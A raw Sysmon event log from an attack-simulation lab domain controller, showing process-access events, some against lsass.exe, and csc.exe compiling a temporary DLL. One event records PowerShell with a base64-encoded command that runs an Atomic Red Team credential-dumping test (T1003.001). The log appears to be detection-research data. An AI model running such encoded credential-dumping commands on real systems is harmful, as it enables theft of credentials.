15:52:57.338{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004918Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.338{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004917Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.338{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004916Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.338{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004915Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.338{D28789B6-7CD8-5FA1-F500-000000008801}49561736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF8DC7A8890) 154100x80000000000000004914Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.340{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000004913Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.134{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004912Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.134{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004911Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.134{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004910Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:57.103{D28789B6-7CD9-5FA1-FA00-000000008801}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\w4gjlxky.dll2020-11-03 15:52:56.994 10341000x80000000000000004909Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.103{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CD9-5FA1-FB00-000000008801}2312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004908Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.103{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004907Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.103{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004906Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.103{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004905Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.103{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004904Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.087{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004903Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.087{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004902Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.087{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004901Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.087{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004900Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.087{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004899Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.087{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CD9-5FA1-FB00-000000008801}2312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004898Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.087{D28789B6-7CD9-5FA1-FA00-000000008801}31685076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CD9-5FA1-FB00-000000008801}2312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004897Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.102{D28789B6-7CD9-5FA1-FB00-000000008801}2312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESE346.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCB70D83F53F9A4E178BE4F2F23F17CE9.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CD9-5FA1-FA00-000000008801}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\w4gjlxky.cmdline" 10341000x80000000000000004896Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.009{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CD9-5FA1-FA00-000000008801}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004895Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 